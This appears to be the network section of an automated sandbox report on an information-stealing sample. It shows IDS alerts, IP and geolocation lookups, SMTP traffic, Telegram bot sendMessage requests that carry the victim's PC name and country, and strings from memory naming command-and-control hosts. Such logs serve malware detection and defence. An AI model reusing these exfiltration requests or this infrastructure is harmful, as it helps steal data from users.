                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49750 -> 104.21.96.1:443
                      Source: global trafficTCP traffic: 192.168.2.5:49751 -> 46.175.148.58:25
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49723 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: mail.iaa-airferight.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:10:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 05:10:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: InstallUtil.exe, 00000004.00000002.2569306283.000000000259F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
                      Source: InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: InstallUtil.exe, 00000004.00000002.2569306283.0000000002511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000251B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                      Source: InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                      Source: InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
